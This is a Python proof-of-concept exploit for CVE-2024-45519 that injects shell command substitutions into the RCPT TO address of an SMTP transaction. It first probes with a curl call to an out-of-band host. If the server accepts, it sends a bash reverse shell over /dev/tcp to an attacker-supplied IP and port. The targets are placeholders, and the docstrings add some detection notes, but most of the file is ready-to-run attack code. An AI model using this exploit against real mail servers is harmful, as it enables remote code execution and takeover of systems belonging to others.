CVE-2024-45519-Poc.py
import socket
def is_port_open(host, port):
    """Return True when a TCP connection to ``(host, port)`` succeeds within 10 s.

    The probe connection is closed immediately after it is established.
    Any socket-level failure (timeout, refusal, unreachable host, name
    resolution error) is reported as False rather than raised.
    """
    try:
        # The context manager closes the probe socket on exit; a failure in
        # close() is caught by the same handler as a failed connect.
        with socket.create_connection((host, port), timeout=10):
            pass
    except (socket.timeout, ConnectionRefusedError, OSError):
        return False
    return True
def smtp_payload_check_vulnerability(host, port, oast):
    """Send an SMTP transaction whose RCPT TO local-part carries a shell command substitution.

    The recipient address embeds ``$(curl${IFS}<oast>)``; the caller (``main``)
    treats a final server response containing "message delivered" as the
    signal that the input was accepted. Whether the substitution is actually
    evaluated on the server is not observable here — presumably it would show
    up as an out-of-band request to ``oast``, but this function does not check.

    Each SMTP reply is read with a single ``recv(1024)``. Returns the last
    reply decoded as UTF-8, or an ``"Error: ..."`` string if any socket
    operation raises.

    Defender's note: the observable indicator is a RCPT TO local-part that
    contains ``$(``, ``${IFS}`` or similar shell metacharacters. That pattern
    is worth alerting on in MTA logs, and the underlying weakness is such
    input reaching a shell unsanitised — a patched server should reject or
    neutralise it and never execute it.
    """
    try:
        with socket.create_connection((host, port), timeout=10) as conn:
            conn.send(b'EHLO localhost\r\n')
            conn.recv(1024)
            # NOTE(review): the sender literal looks masked by the page's
            # e-mail obfuscation; confirm against the upstream file.
            conn.send(b'MAIL FROM: <[email protected]>\r\n')
            conn.recv(1024)
            # Quoted local-part with a command substitution; ${IFS} stands in
            # for the space between the command and its argument.
            rcpt_to_payload = f'RCPT TO: <"aabbb$(curl${{IFS}}{oast})"@mail.domain.com>\r\n'.encode()
            conn.send(rcpt_to_payload)
            conn.recv(1024)
            conn.send(b'DATA\r\n')
            conn.recv(1024)
            # Minimal message body followed by the end-of-data marker.
            conn.send(b'aaa\r\n.\r\n')
            resp = conn.recv(1024)
            conn.send(b'QUIT\r\n')
            return resp.decode('utf-8')
    except Exception as e:
        # Any failure (connect, send, recv, decode) is reported as a string
        # rather than raised, so main() can print it.
        return f"Error: {str(e)}"
def smtp_payload_exploit_reverse_shell(host, port, local_ip, local_port):
    """Send an SMTP transaction whose RCPT TO local-part embeds a bash reverse-shell command.

    The recipient address contains ``$(bash -c '<reverse_shell>')`` where the
    command redirects an interactive bash to ``/dev/tcp/<local_ip>/<local_port>``.
    Each SMTP reply is read with a single ``recv(1024)``; the last reply is
    returned decoded as UTF-8, or an ``"Error: ..."`` string if any socket
    operation raises. The function does not listen for, or verify, any
    connection back to ``local_ip``.

    Defender's note: the execution-side indicators are a shell spawned as a
    child of the mail-handling process and an outbound TCP connection from
    the mail host to an arbitrary address and port. Process-lineage alerting
    on the MTA and egress filtering from mail servers both address this class
    of post-exploitation; the RCPT TO pattern described in
    ``smtp_payload_check_vulnerability`` is the earlier, network-level signal.
    """
    # Interactive bash with stdin/stdout/stderr redirected over /dev/tcp.
    reverse_shell = f'/bin/bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1'
    try:
        with socket.create_connection((host, port), timeout=10) as conn:
            conn.send(b'EHLO localhost\r\n')
            conn.recv(1024)
            # NOTE(review): the sender literal looks masked by the page's
            # e-mail obfuscation; confirm against the upstream file.
            conn.send(b'MAIL FROM: <[email protected]>\r\n')
            conn.recv(1024)
            # Quoted local-part; the reverse-shell command is wrapped in
            # single quotes inside the $(...) substitution.
            rcpt_to_payload = f'RCPT TO: <"exploit$(bash -c \'{reverse_shell}\')"@mail.domain.com>\r\n'.encode()
            conn.send(rcpt_to_payload)
            conn.recv(1024)
            conn.send(b'DATA\r\n')
            conn.recv(1024)
            conn.send(b'Exploit in action\r\n.\r\n')
            resp = conn.recv(1024)
            conn.send(b'QUIT\r\n')
            return resp.decode('utf-8')
    except Exception as e:
        # Any failure (connect, send, recv, decode) is reported as a string
        # rather than raised, so main() can print it.
        return f"Error: {str(e)}"
def main():
    """Drive the check-then-exploit sequence against the hard-coded settings below.

    Order of operations: TCP reachability of ``host:port``; the RCPT TO
    command-substitution probe; and, only if the probe's final reply contains
    the substring "message delivered", the reverse-shell variant. All results
    are printed; nothing is returned.

    The five assignments are placeholders in the published script — the
    values on this page are not real targets.
    """
    host = "target.domain.com"
    port = 25
    oast = "http://your-oast-url.com"
    local_ip = "your-local-ip"
    local_port = 4444
    if is_port_open(host, port):
        print(f"Port {port} is open on {host}")
        print("Checking for vulnerability...")
        response = smtp_payload_check_vulnerability(host, port, oast)
        print("SMTP Response (Vulnerability Check):\n", response)
        # The only "vulnerable" heuristic is a substring match on the last
        # SMTP reply; an "Error: ..." string from the probe will not match
        # and falls through to the else branch.
        if "message delivered" in response:
            print("Vulnerability detected! Proceeding to exploitation...")
            exploit_response = smtp_payload_exploit_reverse_shell(host, port, local_ip, local_port)
            print("SMTP Response (Exploitation - Reverse Shell):\n", exploit_response)
        else:
            print("No vulnerability detected or unable to exploit.")
    else:
        print(f"Port {port} is closed on {host}")
# Script entry point; nothing runs on import.
if __name__ == "__main__":
    main()